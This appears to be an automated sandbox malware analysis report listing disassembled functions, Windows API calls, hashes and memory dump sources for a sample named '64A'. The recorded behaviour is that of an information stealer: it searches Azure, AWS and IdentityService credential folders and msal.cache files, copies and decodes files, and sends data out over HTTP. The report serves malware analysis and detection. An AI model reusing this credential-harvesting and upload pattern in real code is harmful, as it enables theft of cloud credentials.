                                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction Fuzzy Hash: 54A14CBD5C0240BFE364EFE8ED989A63BFBF74E201704661AE605C3264D739A441DB52
                                                  Function 02F104B7 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02F19072
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F09C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02F09C53
                                                    • Part of subcall function 02F09C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02F09C78
                                                    • Part of subcall function 02F09C27: LocalAlloc.KERNEL32(00000040,?), ref: 02F09C98
                                                    • Part of subcall function 02F09C27: ReadFile.KERNEL32(000000FF,?,00000000,02F016F6,00000000), ref: 02F09CC1
                                                    • Part of subcall function 02F09C27: LocalFree.KERNEL32(02F016F6), ref: 02F09CF7
                                                    • Part of subcall function 02F09C27: CloseHandle.KERNEL32(000000FF), ref: 02F09D01
                                                    • Part of subcall function 02F19097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02F190B9
                                                  • strtok_s.MSVCRT ref: 02F10582
                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 02F105C9
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F105D0
                                                  • StrStrA.SHLWAPI(00000000,00421618), ref: 02F105EC
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F105FA
                                                    • Part of subcall function 02F18B47: malloc.MSVCRT ref: 02F18B4F
                                                    • Part of subcall function 02F18B47: strncpy.MSVCRT ref: 02F18B6A
                                                  • StrStrA.SHLWAPI(00000000,00421620), ref: 02F10636
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F10644
                                                  • StrStrA.SHLWAPI(00000000,00421628), ref: 02F10680
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F1068E
                                                  • StrStrA.SHLWAPI(00000000,00421630), ref: 02F106CA
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F106DC
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F10769
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F10781
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F10799
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F107B1
                                                  • lstrcat.KERNEL32(?,0042164C), ref: 02F107C9
                                                  • lstrcat.KERNEL32(?,00421660), ref: 02F107D8
                                                  • lstrcat.KERNEL32(?,00421670), ref: 02F107E7
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F107FA
                                                  • lstrcat.KERNEL32(?,00421678), ref: 02F10809
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F1081C
                                                  • lstrcat.KERNEL32(?,0042167C), ref: 02F1082B
                                                  • lstrcat.KERNEL32(?,00421680), ref: 02F1083A
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F1084D
                                                  • lstrcat.KERNEL32(?,00421688), ref: 02F1085C
                                                  • lstrcat.KERNEL32(?,0042168C), ref: 02F1086B
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F1087E
                                                  • lstrcat.KERNEL32(?,00421698), ref: 02F1088D
                                                  • lstrcat.KERNEL32(?,0042169C), ref: 02F1089C
                                                  • strtok_s.MSVCRT ref: 02F108E0
                                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F108F5
                                                  • memset.MSVCRT ref: 02F10944
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                  • String ID:
                                                  • API String ID: 3689735781-0
                                                  • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                  • Instruction ID: 39c683ee20d57d6211f8718361267a69fa3d9d8d2f9858e599037497570b8015
                                                  • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                  • Instruction Fuzzy Hash: 32D15B75A41208ABCB04FBF0DD95EEEB77AFF14740F904519E202A6090EF74AA49CF61
                                                  Function 00405960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493networkstringmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                                  • StrCmpCA.SHLWAPI(?,02D4AE30), ref: 00405A13
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,02D4AF60,00000000,?,02D14D78,00000000,?,00421A1C), ref: 00405E71
                                                  • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                                  • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                  • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                                  • memcpy.MSVCRT(?), ref: 00405EFE
                                                  • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                                  • HttpOpenRequestA.WININET(00000000,02D4AF90,?,02D4A0C8,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                  • String ID: "$"$------$------$------
                                                  • API String ID: 1406981993-2180234286
                                                  • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                  • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                  • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                  • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                  Function 00414D70 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 119stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00414D87
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                                  • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                  • memset.MSVCRT ref: 00414E13
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                                  • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                  • memset.MSVCRT ref: 00414E9F
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                                  • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,02D4AE80,?,000003E8), ref: 00414A4A
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                  • memset.MSVCRT ref: 00414F2B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                  • API String ID: 4017274736-156832076
                                                  • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                  • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                  • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                  • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                  Function 02F0D157 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02F01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02F18DED
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02F0D1EA
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02F0D32E
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F0D335
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F0D46F
                                                  • lstrcat.KERNEL32(?,00421478), ref: 02F0D47E
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F0D491
                                                  • lstrcat.KERNEL32(?,0042147C), ref: 02F0D4A0
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F0D4B3
                                                  • lstrcat.KERNEL32(?,00421480), ref: 02F0D4C2
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F0D4D5
                                                  • lstrcat.KERNEL32(?,00421484), ref: 02F0D4E4
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F0D4F7
                                                  • lstrcat.KERNEL32(?,00421488), ref: 02F0D506
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F0D519
                                                  • lstrcat.KERNEL32(?,0042148C), ref: 02F0D528
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F0D53B
                                                  • lstrcat.KERNEL32(?,00421490), ref: 02F0D54A
                                                    • Part of subcall function 02F1AA87: lstrlen.KERNEL32(02F0516C,?,?,02F0516C,00420DDE), ref: 02F1AA92
                                                    • Part of subcall function 02F1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02F1AAEC
                                                  • lstrlen.KERNEL32(?), ref: 02F0D591
                                                  • lstrlen.KERNEL32(?), ref: 02F0D5A0
                                                  • memset.MSVCRT ref: 02F0D5EF
                                                    • Part of subcall function 02F1ACD7: StrCmpCA.SHLWAPI(0064A350,02F0AA0E,?,02F0AA0E,0064A350), ref: 02F1ACF6
                                                  • DeleteFileA.KERNEL32(00000000), ref: 02F0D61B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                  • String ID:
                                                  • API String ID: 1973479514-0
                                                  • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                  • Instruction ID: 421096e51040ff418454c2a485c74464462eefe9c14202fb9c2acb36681a28e6
                                                  • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                  • Instruction Fuzzy Hash: B3E16C75941208ABCB08FBE0DD94EEE777ABF14741F904159E206A30A0EF35AB08CF61
                                                  Function 0040CEF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02D14E08,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                                  • lstrcatA.KERNEL32(?,00000000,02D45C60,00421474,02D45C60,00421470,00000000), ref: 0040D208
                                                  • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                                  • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                                  • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                                  • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                                  • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                                  • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                                  • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02D45BB0,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  • lstrlenA.KERNEL32(?), ref: 0040D32A
                                                  • lstrlenA.KERNEL32(?), ref: 0040D339
                                                  • memset.MSVCRT ref: 0040D388
                                                    • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                  • String ID:
                                                  • API String ID: 2775534915-0
                                                  • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                  • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                                  • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                  • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                                  Function 02F05BC7 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A51
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A68
                                                    • Part of subcall function 02F04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A7F
                                                    • Part of subcall function 02F04A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02F04AA0
                                                    • Part of subcall function 02F04A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02F04AB0
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02F05C5F
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 02F05C7A
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02F05DFA
                                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 02F060D8
                                                  • lstrlen.KERNEL32(00000000), ref: 02F060E9
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 02F060FA
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F06101
                                                  • lstrlen.KERNEL32(00000000), ref: 02F06116
                                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 02F0612D
                                                  • lstrlen.KERNEL32(00000000), ref: 02F0613F
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02F06158
                                                  • memcpy.MSVCRT(?), ref: 02F06165
                                                  • lstrlen.KERNEL32(00000000,?,?), ref: 02F06182
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02F06196
                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 02F061B3
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F06217
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F06224
                                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02F05E5F
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                  • InternetCloseHandle.WININET(00000000), ref: 02F0622E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                  • String ID:
                                                  • API String ID: 1703137719-0
                                                  • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                  • Instruction ID: 0c091f6c205aedd5666b7399c5802b62892c84e03f9b4375545c36c942fcd989
                                                  • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                  • Instruction Fuzzy Hash: 9C12C375951218EBCB15EBA0DD94FEEB77ABF14740F904199E20AA2090EF706F89CF50
                                                  Function 02F0CBF7 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 02F0CCD3
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02F0CCF0
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 02F0CCFC
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F0CD0F
                                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 02F0CD1C
                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02F0CD40
                                                  • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 02F0CD5E
                                                  • StrStrA.SHLWAPI(00000000,0064A364), ref: 02F0CD85
                                                  • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 02F0CF09
                                                  • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 02F0CF20
                                                    • Part of subcall function 02F0CA87: memset.MSVCRT ref: 02F0CABA
                                                    • Part of subcall function 02F0CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 02F0CAD8
                                                    • Part of subcall function 02F0CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 02F0CAE3
                                                    • Part of subcall function 02F0CA87: memcpy.MSVCRT(?,?,?), ref: 02F0CB79
                                                  • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 02F0CFC1
